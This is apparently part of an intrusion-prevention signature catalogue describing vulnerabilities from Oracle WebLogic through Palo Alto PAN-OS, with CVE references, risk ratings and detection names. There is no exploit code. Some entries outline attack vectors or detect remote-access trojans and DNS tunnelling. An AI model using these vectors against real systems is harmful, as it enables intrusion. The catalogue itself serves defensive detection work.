Generic

Software:

Oracle WebLogic Server

Type:

Malfunction

Description:

A vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware, versions 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3., which allows unauthenticated users to compromise the server via unsafe deserialization of Java objects using the T3 protocol.

Situation:

Generic_CS-Oracle-WebLogic-Server-Deserialization-Remote-Command-Execution-Vulnerability

References:

CVE-2018-2628
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2628

Oracle-WebLogic-Server-Filedistributionservlet-Information-Disclosure

About this vulnerability:

A vulnerability in Oracle WebLogic Server

Risk:

Moderate

First detected in:

sgpkg-ips-1158-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle WebLogic Server

Type:

Directory Traversal

Description:

Improper validation of the HTTP headers causes a vulnerability in Oracle WebLogic Server. A successful expoit allows an attacker to read arbitrary files on the target system.

Situation:

HTTP_CS-Oracle-WebLogic-Server-Filedistributionservlet-Information-Disclosure

References:

CVE-2019-2615
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2615

Oracle-WebLogic-Server-Fileupload-Library-Insecure-Deserialization

About this vulnerability:

A vulnerability in Oracle WebLogic Server

Risk:

Moderate

First detected in:

sgpkg-ips-784-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle WebLogic Server

Type:

Malfunction

Description:

Insecure deserialization in the fileupload library in Apache Commons results in a vulnerability in Oracle WebLogic Server that allows an attacker to upload arbitrary files to the target system.

Situation:

Generic_CS-Oracle-WebLogic-Server-Fileupload-Library-Insecure-Deserialization

References:

CVE-2013-2186
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2186

BID-63174
http://www.securityfocus.com/bid/63174

Oracle-WebLogic-Server-Information-Disclosure-Vulnerability-CVE-2023-21839

About this vulnerability:

An attempt to exploit a vulnerability in Oracle WebLogic Server detected

Risk:

High

First detected in:

sgpkg-ips-1584-5242

Last changed:

sgpkg-ips-1584-5242

Platform:

Generic

Software:

Oracle WebLogic Server

Type:

Input Validation

Description:

This vulnerability can be exploited through the T3/IIOP protocol network, which transfers information between Oracle WebLogic servers and other Java programs. An attacker can exploit this vulnerability without any privileges and execute low-complexity attacks to gain unauthorized access to sensitive data.

Situation:

Generic_CS-Oracle-WebLogic-Server-Information-Disclosure-Vulnerability-CVE-2023-21839

References:

CVE-2023-21839
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21839

Oracle-WebLogic-Server-LinkRef-JNDI-Injection-CVE-2023-21931

About this vulnerability:

A vulnerability in Oracle WebLogic Server

Risk:

High

First detected in:

sgpkg-ips-1601-5242

Last changed:

sgpkg-ips-1601-5242

Platform:

Generic

Software:

Oracle WebLogic Server

Type:

Input Validation

Description:

A JNDI injection vulnerability has been reported in Oracle Weblogic Server. This vulnerability is due to improper handling of user input when using the server naming service to bind a LinkRef object. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request to a vulnerable server. Successful exploitation results in the target server performing a JNDI lookup to an attacker controlled server, and in the worst case execution of arbitrary code under the security context of the affected server.

Situation:

Generic_CS-Oracle-WebLogic-Server-LinkRef-JNDI-Injection-CVE-2023-21931

References:

CVE-2023-21931
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21931

Oracle-WebLogic-Server-Local-File-Inclusion-CVE-2022-21371

About this vulnerability:

A vulnerability in Oracle WebLogic Server

Risk:

High

First detected in:

sgpkg-ips-1502-5242

Last changed:

sgpkg-ips-1502-5242

Platform:

Generic

Software:

Oracle WebLogic Server

Type:

Input Validation

Description:

A local file inclusion vulnerability has been reported in Oracle WebLogic Server. A successful attack allows remote attackers to gain access to sensitive information without authentication.

Situation:

HTTP_CSU-Oracle-WebLogic-Server-Local-File-Inclusion-CVE-2022-21371

References:

CVE-2022-21371
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21371

Oracle-WebLogic-Server-Node-Manager-Command-Execution

About this vulnerability:	A vulnerability in Oracle WebLogic Server
Risk:	High
First detected in:	sgpkg-ips-411-4219
Last changed:	sgpkg-ips-1733-5242
Platform:	Generic
Software:	Oracle WebLogic Server
Type:	Malfunction
Description:	A command execution vulnerability exists in Oracle WebLogic Server's Node Manager utility. The vulnerability is due to the fact that certain script execution functionality of the Node Manager utility can be accessed remotely without authentication. A remote unauthenticated attacker can leverage this vulnerability by sending a crafted message to the vulnerable process on port 5556/TCP. Successful exploitation could result in execution of arbitrary commands within the security context of the target process. The behaviour of the target is dependent on the intention of the malicious command.
Situation:	Generic_CS-Oracle-WebLogic-Server-Node-Manager-Command-Execution

Oracle-WebLogic-Server-RCE-Vulnerability-CVE-2019-2725

About this vulnerability:

A vulnerability in Oracle WebLogic Server

Risk:

High

First detected in:

sgpkg-ips-1153-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle WebLogic Server

Type:

Malfunction

Description:

There exists a vulnerability in the Oracle WebLogic Server which allows unauthenticated users to compromise the server via unsafe deserialization of Java objects using the T3 protocol.

Situation:

Generic_CS-Oracle-WebLogic-Server-Remoteobject-Insecure-Deserialization

References:

CVE-2019-2725
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2725

Oracle-WebLogic-Server-Remote-Command-Execution-CVE-2017-3506

About this vulnerability:

A vulnerability in Oracle WebLogic Server

Risk:

High

First detected in:

sgpkg-ips-1822-5242

Last changed:

sgpkg-ips-1822-5242

Platform:

Generic

Software:

Oracle WebLogic Server

Type:

Input Validation

Description:

A remote command execution has been reported in the Web Services component of the Oracle WebLogic Server. Affected versions include 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1, and 12.2.1.2. An unauthenticated attacker could use this vulnerability to execute arbitrary OS commands via a crafted HTTP request.

Situation:

HTTP_CS-Oracle-WebLogic-Server-Workcontextxmlinputadapter-Insecure-Deserialization

References:

CVE-2017-3506
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3506

Oracle-WebLogic-Server-Remoteobject-Insecure-Deserialization

About this vulnerability:

A vulnerability in Oracle WebLogic Server

Risk:

Moderate

First detected in:

sgpkg-ips-1111-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle WebLogic Server

Type:

Input Validation

Description:

There has been reported an insecure deserialization vulnerability in Oracle WebLogic Server. This vulnerability can be exploited remotely. Successful exploitation results in arbitrary code execution.

Situation:

Generic_CS-Oracle-WebLogic-Server-Remoteobject-Insecure-Deserialization

References:

CVE-2018-3245
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3245

Oracle-WebLogic-Server-Session-Fixation

About this vulnerability:

A vulnerability in Oracle WebLogic Server

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle WebLogic Server

Type:

Malfunction

Description:

There is a session fixation vulnerability in Oracle WebLogic Server. This vulnerability allows attackers to fixate session identifiers for user sessions and potentially gain unauthorized access to the affected product. The vulnerability is due to an error in the when processing sessions in web applications created using WebLogic's framework. A remote attacker can exploit this vulnerability by enticing a user to visit a specially crafted web page. Successful exploitation would let the attacker gain access to the pages that are authorized to the victim user.

Situation:

Generic_SS-Oracle-WebLogic-Server-Session-Fixation
HTTP_SHS-Oracle-WebLogic-Server-Session-Fixation

References:

CVE-2010-4437
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4437

BID-45852
http://www.securityfocus.com/bid/45852

OSVDB-70571
http://www.osvdb.org/70571

Oracle-WebLogic-Server-Unicastref-Insecure-Deserialization

About this vulnerability:

A vulnerability in Oracle WebLogic Server

Risk:

Moderate

First detected in:

sgpkg-ips-860-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle WebLogic Server

Type:

Malfunction

Description:

Deseralization of untrusted data in Oracle WebLogic Server while having the UnicastRef class in the code path causes a vulnerability which a remote, unauthenticated attacker can exploit by sending a specially crafted serialized object. Successful exploitation can result in arbitrary code execution in the context of the user running WebLogic.

Situation:

Generic_CS-Oracle-WebLogic-Server-Unicastref-Insecure-Deserialization

References:

CVE-2017-3248
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3248

Oracle-WebLogic-Server-Web-Service-Config-Arbitrary-File-Upload

About this vulnerability:

A vulnerability in Oracle WebLogic Server

Risk:

Moderate

First detected in:

sgpkg-ips-1091-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

<os>

Type:

Malfunction

Description:

A vulnerability in Oracle WebLogic Server

Situation:

File-Text_Oracle-WebLogic-Server-Web-Service-Config-Arbitrary-File-Upload

References:

CVE-2018-2894
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2894

Oracle-WebLogic-Server-Workcontextxmlinputadapter-Insecure-Deserialization

About this vulnerability:

A vulnerability in Oracle WebLogic Server

Risk:

Moderate

First detected in:

sgpkg-ips-1029-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle WebLogic Server

Type:

Input Validation

Description:

Insufficient validation of serialized XML data by the WorkContextXmlInputAdapter class in the Oracle WebLogic Server causes a vulnerability which can be exploited to gain the ability to execute arbitrary code on the target system.

Situation:

HTTP_CS-Oracle-WebLogic-Server-Workcontextxmlinputadapter-Insecure-Deserialization

References:

CVE-2017-10271
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10271

Oracle-WebLogic-Unknownmsgheader-External-Entity-Injection

About this vulnerability:

A vulnerability in Oracle WebLogic Server

Risk:

High

First detected in:

sgpkg-ips-1174-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle WebLogic Server

Type:

Input Validation

Description:

An XXE vulnerability has been reported in Oracle Weblogic. This vulnerability is due to insufficient validation of XML data. A remote attacker could exploit this vulnerability by sending malicious XML data to the target server. Successful exploitation could result in the disclosure of file content on the target machine.

Situation:

Generic_CS-Oracle-WebLogic-Unknownmsgheader-External-Entity-Injection

References:

CVE-2019-2649
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2649

Oracle-WebLogic-Wsrmsequencecontext-External-Entity-Injection

About this vulnerability:

A vulnerability in Oracle WebLogic Server

Risk:

Moderate

First detected in:

sgpkg-ips-1176-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle WebLogic Server

Type:

Input Validation

Description:

Insufficient validation of client-provided XML data causes an external entity injection vulnerability in Orace WebLogic Server. A successful exploit may allow an attacker to gain access to file contents of the target system.

Situation:

Generic_CS-Oracle-WebLogic-Wsrmsequencecontext-External-Entity-Injection

References:

CVE-2019-2650
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2650

Oracle-WebLogic-Wsrmserverpayloadcontext-External-Entity-Injection

About this vulnerability:

A vulnerability in Oracle WebLogic Server

Risk:

Moderate

First detected in:

sgpkg-ips-1169-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle WebLogic Server

Type:

Input Validation

Description:

There has been reported an XXE vulnerability in Oracle Weblogic. This vulnerability could be exploited by a remote attacker. Successful exploitation could lead in information disclosure.

Situation:

Generic_CS-Oracle-WebLogic-Wsrmserverpayloadcontext-External-Entity-Injection

References:

CVE-2019-2648
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2648

Oracle10g-TNS-Auth-Sesskey-BOF

About this vulnerability:

Buffer overflow in Oracle 10g TNS listener

Risk:

High

First detected in:

sgpkg-ips-402-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle 10g

Type:

Buffer Overflow

Description:

Oracle 10g is vulnerable to a buffer overflow in the Transparent Network Substrate (TNS) Listener.

Situation:

Generic_CS-Oracle10g-TNS-Auth-Sesskey-BOF
TNS_Oracle10g-TNS-Auth-Sesskey-BOF

References:

CVE-2009-1979
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1979

BID-36747
http://www.securityfocus.com/bid/36747

OSVDB-59110
http://www.osvdb.org/59110

Oracle8i-TNS-Listener-BOF

About this vulnerability:

Buffer overflow in Oracle 8i TNS listener

Risk:

High

First detected in:

sgpkg-ips-17-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle 8i

Type:

Buffer Overflow

Description:

Oracle 8i is vulnerable to a buffer overflow in the Transparent Network Substrate (TNS) Listener. By sending a one-packet command to the Net8 protocol, a remote attacker can overflow a buffer and execute arbitrary code on the system to gain administrator privileges.

Situation:

TNS_Oracle8i-TNS-Listener-BOF

References:

CVE-2001-0499
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0499

BID-2941
http://www.securityfocus.com/bid/2941

OSVDB-9427
http://www.osvdb.org/9427

Orbit-Downloader-Stack-Based-Buffer-Overflow

About this vulnerability:

A stack based buffer overflow vulnerability in Orbit Downloader.

Risk:

High

First detected in:

sgpkg-ips-665-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Orbit Downloader

Type:

Buffer Overflow

Description:

A stack based buffer overflow vulnerability in Orbit Downloader 2.8.2 and 2.8.3 which allows remote attackers to execute arbitrary code via a crafted HTTP URL with a long host name.

Situation:

File-Text_Orbit-Downloader-Stack-Based-Buffer-Overflow

References:

CVE-2009-0187
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0187

BID-33894
http://www.securityfocus.com/bid/33894

OSVDB-52294
http://www.osvdb.org/52294

Orcus-RAT-Infection-Traffic

About this vulnerability:	Orcus RAT infection traffic was detected
Risk:	High
First detected in:	sgpkg-ips-1374-5242
Last changed:	sgpkg-ips-1374-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Orcus RAT infection traffic was detected.
Situation:	TLS_SS-Orcus-RAT-Infection-Traffic TLS-SNI_Orcus-RAT-Infection-Traffic

OrientDB-Remote-Code-Execution

About this vulnerability:	An OrientDB Remote Code Execution vulnerability
Risk:	High
First detected in:	sgpkg-ips-1022-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows; Linux; Unix
Software:	OrientDB
Type:	Malfunction
Description:	A vulnerability in OrientDB, versions 2.2.2 through 2.2.22, which allows remote attackers to execute unsandboxed OS commands.
Situation:	HTTP_CRL-OrientDB-Remote-Code-Execution

osCommerce-Installer-Unauthenticated-Code-Execution

About this vulnerability:	An osCommerce Installer Unauthenticated Code Execution vulnerability
Risk:	High
First detected in:	sgpkg-ips-1071-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	osCommerce
Type:	Malfunction
Description:	A vulnerability in osCommerce, version 2.3.4.1, which allows remote attackers to inject PHP code into a newly created install script due to the install_4.php script not checking to see if the page is already installed.
Situation:	HTTP_CRL-osCommerce-Installer-Unauthenticated-Code-Execution

Ourgame-GlobalLink-GLChat-ActiveX-Control-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in Ourgame GlobalLink

Risk:

High

First detected in:

sgpkg-ips-136-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Ourgame GlobalLink

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the GLChat ActiveX component included in Ourgame GlobalLink. The vulnerability allows arbitrary code execution in the context of the current user.

Situation:

HTTP_SS-Ourgame-GlobalLink-GLChat-ActiveX-Control-Buffer-Overflow
File-Text_Ourgame-GlobalLink-GLChat-ActiveX-Control-Buffer-Overflow

References:

CVE-2007-5722
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5722

BID-26244
http://www.securityfocus.com/bid/26244

OSVDB-38837
http://www.osvdb.org/38837

Ourworld-GLWorld-ActiveX-Component-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in Ourworld GLWorld

Risk:

High

First detected in:

sgpkg-ips-154-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Ourworld GLWorld

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Ourworld GLWorld ActiveX component. The vulnerability allows execution of arbitrary code in the context of the current user.

Situation:

HTTP_SS-Ourworld-GLWorld-ActiveX-Component-Buffer-Overflow
File-Text_Ourworld-GLWorld-ActiveX-Component-Buffer-Overflow

References:

CVE-2008-0647
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0647

BID-27626
http://www.securityfocus.com/bid/27626

Out-Of-Bound-Memory-Read-In-Smb-Kernel-Server-Ksmbd-ZDI-22-1691

About this vulnerability:

An attempt to exploit a vulnerability in ksmbd detected

Risk:

High

First detected in:

sgpkg-ips-1541-5242

Last changed:

sgpkg-ips-1542-5242

Platform:

Linux

Software:

ksmbd

Type:

Input Validation

Description:

The flaw exists within the handling of SMB2_WRITE commands in SMB Kernel Server ksmbd. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the kernel.

Situation:

SMB-TCP_Out-Of-Bound-Memory-Read-In-Smb-Kernel-Server-Ksmbd-ZDI-22-1691

References:

CVE-2022-47940
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-47940

Outlook-BOF-MS04-009

About this vulnerability:

Microsoft Outlook Buffer Overflow Vulnerability (MS04-009)

Risk:

High

First detected in:

sgpkg-ips-409-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Outlook

Type:

Buffer Overflow

Description:

Microsoft Outlook, an email client, contains a vulnerability in the handling of a mailto: URI. The lack of filtering of parameters passed to Outlook via the "mailto:" URI allows for script execution in the Local Machine zone on a vulnerable system. The expected behaviour of the attack target depends on the payload script carried in the malicious "mailto:" link. Since the script could execute a wide variety of functions in the local domain zone, it would be difficult to predict the behaviour of the target system.

Situation:

File-Text_Microsoft-Outlook-Mail-To-RCE

References:

CVE-2004-0121
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0121

BID-9827
http://www.securityfocus.com/bid/9827

MS04-009
http://technet.microsoft.com/security/bulletin/MS04-009

Outlook-Express-And-Windows-Mail-NNTP-Handling-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Outlook Express

Risk:

Moderate

First detected in:

sgpkg-ips-437-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability exists in Microsoft Outlook Express and Windows Mail. Specifically the vulnerability is due to lack of boundary check when processing news subjects from the NNTP server. Successful exploitation would allow the attacker to execute arbitrary code on the vulnerable client system, in the context of the logged in user. An attack targeting this vulnerability can result in the injection and execution of arbitrary code. If code execution is successful, the behaviour of the target will depend on the intention of the attacker. Any injected code will be executed within the security context of the currently logged in user. In the case of an unsuccessful code execution attack, Microsoft Outlook Express and/or Windows Mail will terminate unexpectedly.

Situation:

NNTP_Microsoft-Outlook-Express-And-Windows-Mail-NNTP-Handling-Code-Execution

References:

CVE-2007-3897
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3897

BID-25908
http://www.securityfocus.com/bid/25908

MS07-056
http://technet.microsoft.com/security/bulletin/MS07-056

Overly-Long-RTSP-Host-Header

About this vulnerability:	An overly long RTSP Host header
Risk:	Moderate
First detected in:	sgpkg-ips-1645-5242
Last changed:	sgpkg-ips-1645-5242
Platform:	Generic
Software:	Any Software
Type:	Malfunction
Description:	An overly long Host header was seen in an RTSP request. This might indicate an attempt to exploit a buffer overflow vulnerability.
Situation:	Generic_CS-Overly-Long-RTSP-Host-Header

Owncloud-Information-Disclosure-CVE-2023-49103

About this vulnerability:

A vulnerability in ownCloud

Risk:

High

First detected in:

sgpkg-ips-1657-5242

Last changed:

sgpkg-ips-1657-5242

Platform:

Generic

Software:

ownCloud

Type:

Malfunction

Description:

An information disclosure vulnerability has been reported in ownCloud graphapi app. This vulnerability is due to a third-party library containing a url that reveals the output of phpinfo. An unauthenticated attacker can use this vulnerability to obtain information about the configuration, including every environment variable on the webserver. In containerised environments these variables may contain the ownCloud admin password and other sensitive information.

Situation:

HTTP_CSU-Owncloud-Information-Disclosure-CVE-2023-49103

References:

CVE-2023-49103
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-49103

Ozdok-Bot

About this vulnerability:	Ozdok Bot
Risk:	High
First detected in:	sgpkg-ips-622-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Ozdok is a botnet responsible for sending e-mail spam.
Situation:	HTTP_CS-Ozdok-Bot-Activity

OzymanDNS-Tunnel

About this vulnerability:	OzymanDNS Tunnel
Risk:	Moderate
First detected in:	sgpkg-ips-513-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Remote Control
Description:	OzymanDNS is a software that allows one to tunnel arbitrary traffic over regular DNS requests.
Situation:	DNS-UDP_OzymanDNS-Tunnel-Request DNS-UDP_OzymanDNS-Tunnel-Response

PAC-Resolver-Remote-Code-Execution

About this vulnerability:

An attempt to exploit a vulnerability in PAC resolver detected

Risk:

High

First detected in:

sgpkg-ips-1391-5242

Last changed:

sgpkg-ips-1391-5242

Platform:

Generic

Software:

<os>

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in PAC resolver detected.

Situation:

File-Text_PAC-Resolver-Remote-Code-Execution

References:

CVE-2021-23406
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23406

PacketTrap-TFTP-Server-Denial-Of-Service

About this vulnerability:

A PacketTrap TFTP Server Denial Of Service vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-731-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PacketTrap TFTP Server

Type:

Input Validation

Description:

A vulnerability in PacketTrap TFTP Server, versions 2.0.3901.0 and before, which allows remote attackers to cause a denial of service condition by sending a pipe |, quotation mark ", or lessthan greaterthan <> characters, in the file name attribute.

Situation:

TFTP_PacketTrap-TFTP-Server-Denial-Of-Service

References:

CVE-2008-1311
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1311

OSVDB-42932
http://www.osvdb.org/42932

PAJAX-Remote-Command-Execution

About this vulnerability:

A PAJAX Remote Command Execution vulnerability.

Risk:

High

First detected in:

sgpkg-ips-737-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PAJAX

Type:

Input Validation

Description:

A vulnerability in PAJAX, versions 0.5.1 and earlier, which allows remote attackers to execute arbitrary code via the $method and $args parameters.

Situation:

HTTP_CRL-PAJAX-Remote-Command-Execution

References:

CVE-2006-1551
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1551

BID-17519
http://www.securityfocus.com/bid/17519

OSVDB-24618
http://www.osvdb.org/24618

Palevo-Botnet

About this vulnerability:	Palevo botnet
Risk:	High
First detected in:	sgpkg-ips-559-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Remote Control
Description:	Palevo is a malicious botnet with a malware download component. Palevo has been observed to download malicious executables such as spambots, banking trojans or other malware downloaders. As such, users of infected PCs should not only delete Palevo, but should also make sure no other malware is running on the infected PC.
Situation:	Datalength-UDP_Palevo

Palo-Alto-Expedition-Command-Injection-CVE-2024-9463

About this vulnerability:

A vulnerability in Palo Alto Expedition

Risk:

High

First detected in:

sgpkg-ips-1822-5242

Last changed:

sgpkg-ips-1822-5242

Platform:

Generic

Software:

Palo Alto Expedition

Type:

Input Validation

Description:

Improper validation of user-submitted data in requests to the cronjob configuration causes a command injection vulnerability that allows an attacker to execute arbitrary code on the target system.

Situation:

HTTP_CRL-Palo-Alto-Expedition-Command-Injection-CVE-2024-9463

References:

CVE-2024-9463
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-9463

Palo-Alto-Expedition-Missing-Authentication-CVE-2024-5910

About this vulnerability:

A vulnerability in Palo Alto Expedition

Risk:

High

First detected in:

sgpkg-ips-1789-5242

Last changed:

sgpkg-ips-1789-5242

Platform:

Generic

Software:

Palo Alto Expedition

Type:

Insecure Configuration

Description:

Missing authentication for restoreAdmin.php in Palo Alto Networks Expedition allows resetting the Expedition admin credentials to publicly known defaults.

Situation:

HTTP_CSU-Palo-Alto-Expedition-Missing-Authentication-CVE-2024-5910

References:

CVE-2024-5910
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5910

Palo-Alto-Expedition-OS-Command-Injection-CVE-2024-9464

About this vulnerability:

A vulnerability in Palo Alto Expedition

Risk:

High

First detected in:

sgpkg-ips-1789-5242

Last changed:

sgpkg-ips-1789-5242

Platform:

Generic

Software:

Palo Alto Expedition

Type:

Input Validation

Description:

An OS command injection has been reported in Palo Alto Networks Expedition. An authenticated attacker can use this vulnerability to execute arbitrary OS commands, possibly leading into the disclosure of sensitive information such as cleartext passwords. Obtaining the credentials to bypass the authentication requirement for exploitation can be achieved with CVE-2024-5910.

Situation:

HTTP_CRL-Palo-Alto-Expedition-OS-Command-Injection-CVE-2024-9464

References:

CVE-2024-9464
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-9464

Palo-Alto-Expedition-Regionsdiscovery.php-Insecure-Deserialization-CVE-2025-0107

About this vulnerability:

A vulnerability in Palo Alto Networks Expedition Migration Tool

Risk:

High

First detected in:

sgpkg-ips-1834-5242

Last changed:

sgpkg-ips-1834-5242

Platform:

Generic

Software:

Palo Alto Expedition

Type:

Input Validation

Description:

An insecure deserialization vulnerability exists in Palo Alto Networks Expedition. The vulnerability is due to improper input validation when handling requests to the /API/regionsDiscovery.php endpoint. Successfully exploiting this vulnerability could result in pre-authenticated remote code execution.

Situation:

HTTP_CRL-Palo-Alto-Expedition-Regionsdiscovery.php-Insecure-Deserialization-CVE-2025-0107

References:

CVE-2025-0107
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-0107

Palo-Alto-Expedition-SQL-Injection-CVE-2024-9465

About this vulnerability:

A vulnerability in Palo Alto Expedition

Risk:

High

First detected in:

sgpkg-ips-1789-5242

Last changed:

sgpkg-ips-1789-5242

Platform:

Generic

Software:

Palo Alto Expedition

Type:

SQL Injection

Description:

A SQL injection vulnerability has been reported in Palo Alto Networks Expedition. Successfully exploiting this vulnerability allows an unauthenticated attacker to read and create arbitrary files on the Expedition system.

Situation:

HTTP_CRL-Palo-Alto-Expedition-SQL-Injection-CVE-2024-9465

References:

CVE-2024-9465
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-9465

Palo-Alto-Networks-Expedition-deleteParquet.php-Arbitrary-File-Deletion

About this vulnerability:

A vulnerability in Palo Alto Expedition

Risk:

High

First detected in:

sgpkg-ips-1834-5242

Last changed:

sgpkg-ips-1834-5242

Platform:

Generic

Software:

Palo Alto Expedition

Type:

Input Validation

Description:

A vulnerability in Palo Alto Expedition, versions prior to 1.2.101, which allows remote attackers to send a crafted request to a target server and delete arbitrary files or cause a denial of service condition, due to the improper validation in the PHP script deleteParquet.php.

Situation:

HTTP_CS-Palo-Alto-Networks-Expedition-deleteParquet.php-Arbitrary-File-Deletion

References:

CVE-2025-0105
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-0105

Palo-Alto-PAN-OS-Authentication-Bypass-CVE-2025-0108

About this vulnerability:

A vulnerability in Palo Alto PAN-OS

Risk:

High

First detected in:

sgpkg-ips-1838-5242

Last changed:

sgpkg-ips-1838-5242

Platform:

PAN-OS

Software:

<os>

Type:

Directory Traversal

Description:

A path confusion in Palo Alto Networks PAN-OS allows an unauthenticated attacker to invoke PHP scripts that otherwise require authentication.

Situation:

HTTP_CSU-Palo-Alto-PAN-OS-Authentication-Bypass-CVE-2025-0108

References:

CVE-2025-0108
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-0108

Palo-Alto-SSLVPN-Authentication-Bypass

About this vulnerability:

A vulnerability in Palo Alto SSLVPN Appliance

Risk:

Moderate

First detected in:

sgpkg-ips-1802-5242

Last changed:

sgpkg-ips-1802-5242

Platform:

Generic

Software:

Palo Alto SSLVPN Appliance

Type:

Input Validation

Description:

Palo Alto SSLVPN Appliances allow a remote attacker to turn off authentication in requests in order to gain access to the system management facilities.

Situation:

HTTP_CSH-Palo-Alto-SSLVPN-Authentication-Bypass

References:

CVE-2024-0012
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-0012

Palo-Alto-SSLVPN-Command-Execution-CVE-2024-9474

About this vulnerability:

A vulnerability in Palo Alto SSLVPN Appliance

Risk:

Moderate

First detected in:

sgpkg-ips-1802-5242

Last changed:

sgpkg-ips-1802-5242

Platform:

Generic

Software:

Palo Alto SSLVPN Appliance

Type:

Input Validation

Description:

Palo Alto SSLVPN Appliances allow a remote attacker to turn off and bypass authentication in requests in order to gain access to the system management facilities.

Situation:

HTTP_CRL-Palo-Alto-SSLVPN-Command-Execution-CVE-2024-9474

References:

CVE-2024-9474
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-9474

PAN-OS-GlobalProtect-Command-Injection-CVE-2024-3400

About this vulnerability:

An attempt to exploit a vulnerability in GlobalProtect detected

Risk:

High

First detected in:

sgpkg-ips-1716-5242

Last changed:

sgpkg-ips-1725-5242

Platform:

Generic

Software:

GlobalProtect

Type:

Input Validation

Description:

A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall. Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.

Situation:

HTTP_CSH-Directory-Traversal-In-Session-Id-Cookie
HTTP_CSH-PAN-OS-GlobalProtect-Command-Injection-CVE-2024-3400

References:

CVE-2024-3400
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-3400

